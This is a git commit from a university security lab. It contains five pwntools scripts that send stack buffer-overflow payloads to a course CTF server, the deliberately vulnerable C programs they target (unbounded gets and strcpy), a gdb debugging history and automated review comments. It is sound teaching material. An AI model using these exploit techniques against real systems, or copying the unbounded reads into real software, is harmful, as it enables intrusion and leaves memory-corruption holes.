Partial lab6

2025-12-20 15:44:03 +00:00
parent ef11ce0307
commit 82b7b8c565
15 changed files with 304 additions and 0 deletions

pa/lab6/.gdb_history Normal file

@@ -0,0 +1,119 @@
disas main
disas win
disas main
q
disas challenge
disas win
q
disas challenge
q
p /x &buffer
disas challenge
q
disas challenge
q
q
disas main
disas check_password
q
disas check_password
q
q
disas check_password
q
disas check_password
q
disassemble challenge
q
disas check_password
q
disas main
q
disas main
disas check_password
q
b main
r
b check_password
c
stack 50
disas check_
disas check_password
r
a
c
disas check_password
b 0x08048731
b *0x08048731
r
c
p /x $ebx
c
stack 50
q
disas main
q
disas check_password
q
b *0x08048731
r
si
stack 50
q
b *0x08048731
r
p $ebp
q
attach 103318
b *0x08048731
c
stack 50
b *(0x804874d+5)
c
stack 50
q
attach 104773
disas check_
disas check_password
b *0x08048738
c
b * 0x8048752
stack 30
c
stack 30
q
attach 106286
disas check_password
b *0x08048735
p *0x08048752
b *0x08048752
c
si
stack 50
q
attach 107369
b *0x08048735
b *0x08048752
c
si
stack 30
c
si
stack 30
c
q
attach 111389
b *0x08048752
b *0x08048735
c
stack 30
si
stack 30
next
stack 20
i
if
i f
stack
disas check_password
q


@@ -0,0 +1,12 @@
from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25153
WIN_ADDR = 0x080486f1
conn = remote(HOST, PORT)
conn.recvuntil("?\n")
conn.send(b"\x55"*32 + b"\xf1\x86\x04\x08\n")
conn.interactive()
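Review bot: `WIN_ADDR` is assigned but never used; the `conn.send` line repeats the same address as a hand-written byte string, so the constant and the bytes actually sent can drift apart unnoticed. Either delete the constant or derive the bytes from it with `p32(WIN_ADDR)`, the helper the last script in this commit already uses. `conn.recvuntil("?\n")` also passes a `str` where pwntools works on bytes; `conn.recvuntil(b"?\n")` states the intent and avoids the implicit encoding. The `str` argument recurs in the next three scripts, and the unused `WIN_ADDR` recurs in the port-25154 script.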


@@ -0,0 +1,10 @@
from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25152
conn = remote(HOST, PORT)
conn.recvuntil("?\n")
conn.send(b"\x55"*64 + b"dcba\n")
conn.interactive()


@@ -0,0 +1,12 @@
from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25154
WIN_ADDR = 0x080486f1
conn = remote(HOST, PORT)
conn.recvuntil("'\n")
conn.send(b"\x55"*0x12 + b"\xaa"*4 + b"\xf1\x86\x04\x08\n")
conn.interactive()


@@ -0,0 +1,10 @@
from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25151
conn = remote(HOST, PORT)
conn.recvuntil("0.\n")
conn.send(b"\x55"*128 + b"\x01\n")
conn.interactive()


@@ -0,0 +1,15 @@
from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25155
WIN_ADDR = p32(0x080487d9)
EBX = p32(0x804a001) # Has NULL byte
EBP = p32(0xffffcdd8)
#conn = process("./check")
conn = remote(HOST, PORT)
pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR
input()
conn.send(pl)
conn.interactive()
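Review bot: The bare `input()` before `conn.send(pl)` blocks the script with no prompt, and together with the commented-out `#conn = process("./check")` it reads like leftover debugging scaffolding. If the pause is wanted, give it a message, e.g. `input("press Enter to send")`; otherwise remove both lines so the committed script runs unattended like the other four.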

pa/lab6/check Executable file

Binary file not shown.

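--- a/pa/lab6/check.c
+++ b/pa/lab6/check.c
@@ -0,0 +1,30 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+int check_password(char* password) {
+char buffer[32];
+strcpy(buffer, password);
+if(strcmp(buffer, getflag()) == 0)
+return 1;
+return 0;
+}
+int main() {
+init();
+char pass[64] = {0};
+// we know how to make this secure. No gets in here.
+read(0, pass, 63);
+if(check_password(pass)){
+printf("Welcome back! Here is the secret flag that you already knew: %s\n", getflag());
+} else {
+printf("Unauthorized user/passwd\n");
+}
+}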
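Review bot: `strcpy(buffer, password)` in `check_password` has no length bound: `main` reads up to 63 bytes into `pass`, but `buffer` holds 32, so any input longer than 31 bytes is written past the end of `buffer` on the stack. The comment `// we know how to make this secure. No gets in here.` is therefore misleading, because bounding the `read` in `main` does not bound the copy in the callee. If the overflow is the intended lab target, say so next to the `strcpy`, e.g. `/* deliberately unbounded copy: exercise target, do not reuse */`; otherwise the copy is unnecessary and the body can be `return strcmp(password, getflag()) == 0;`. The return value of `read` is also ignored, so a failed or empty read is indistinguishable from a wrong password.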

pa/lab6/functions Normal file

Binary file not shown.

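--- a/pa/lab6/functions.c
+++ b/pa/lab6/functions.c
@@ -0,0 +1,27 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+void win() {
+printf("Congratulations, you win!!! You successfully changed the code flow\n");
+printf("Flag: %s\n", getflag());
+}
+int main() {
+init();
+int (*fp)();
+char buffer[32];
+fp = 0;
+printf("You win this game if you are able to call the function win. Can you do it?\n");
+gets(buffer);
+if(fp) {
+printf("Calling function pointer... jumping to %p\n", fp);
+fp();
+}
+}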
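Review bot: `gets(buffer)` in `main` reads a line of any length into the 32-byte `buffer`, and the same function then calls the local pointer `fp` whenever it is non-zero, so input length alone decides whether memory beyond the array is overwritten. `gets` was removed from the language in C11; outside a deliberately vulnerable exercise the read should be `fgets(buffer, sizeof buffer, stdin)`, and if the flaw is intentional a one-line comment at the call should say so. The same unbounded `gets` appears in match.c, return.c and simple.c in this commit. Separately, `%p` expects a `void *`, so the `printf` argument should be written `(void *)fp`.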

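--- a/pa/lab6/match.c
+++ b/pa/lab6/match.c
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+int main() {
+init();
+int test;
+char buffer[64];
+printf("You win this game if you can change variable test to the value 0x61626364. Have you noticed that the ascii code of 'a' is 0x61?\n");
+test = 0;
+gets(buffer);
+if (test == 0x61626364) {
+printf("Congratulations, you win!!! You correctly got the variable to the right value\n");
+printf("Flag: %s\n", getflag());
+} else {
+printf("Try again, you got 0x%08x, instead of 0x61626364\n", test);
+}
+}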
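Review bot: `<stdio.h>` is included twice at the top of the file (simple.c has the same duplicate); the second `#include <stdio.h>` can be dropped. In the `else` branch `test` is an `int` but is printed with `%08x`, which expects an `unsigned int`; declare it `unsigned int test;` or pass `(unsigned int)test` so the format and argument types agree.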

pa/lab6/return Normal file

Binary file not shown.

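--- a/pa/lab6/return.c
+++ b/pa/lab6/return.c
@@ -0,0 +1,22 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+void win() {
+printf("Congratulations, you win!!! You successfully changed the code flow\n");
+printf("Flag, %s\n", getflag());
+}
+void challenge() {
+char buffer[10];
+printf("You win this game if you are able to call the function win.'\n");
+gets(buffer);
+}
+int main() {
+init();
+challenge();
+return 0;
+}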
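Review bot: The flag line in `win` prints `"Flag, %s\n"` while functions.c, match.c and simple.c print `"Flag: %s\n"`; anything that parses the output for the `Flag: ` prefix will miss this program, so the comma looks like a typo for a colon. The prompt in `challenge` also ends with a stray `'` before the newline. A client script in this commit waits on `'\n`, so if the prompt text is corrected that script has to change with it.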

pa/lab6/simple Executable file

Binary file not shown.

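--- a/pa/lab6/simple.c
+++ b/pa/lab6/simple.c
@@ -0,0 +1,23 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include "general.h"
+int main() {
+init();
+int test;
+char buffer[128];
+printf("You win this game if you change variable test to a value different from 0.\n");
+test = 0;
+gets(buffer);
+if(test != 0) {
+printf("YOU WIN!\n");
+printf("Flag: %s\n", getflag());
+} else {
+printf("Try again...\n");
+}
+}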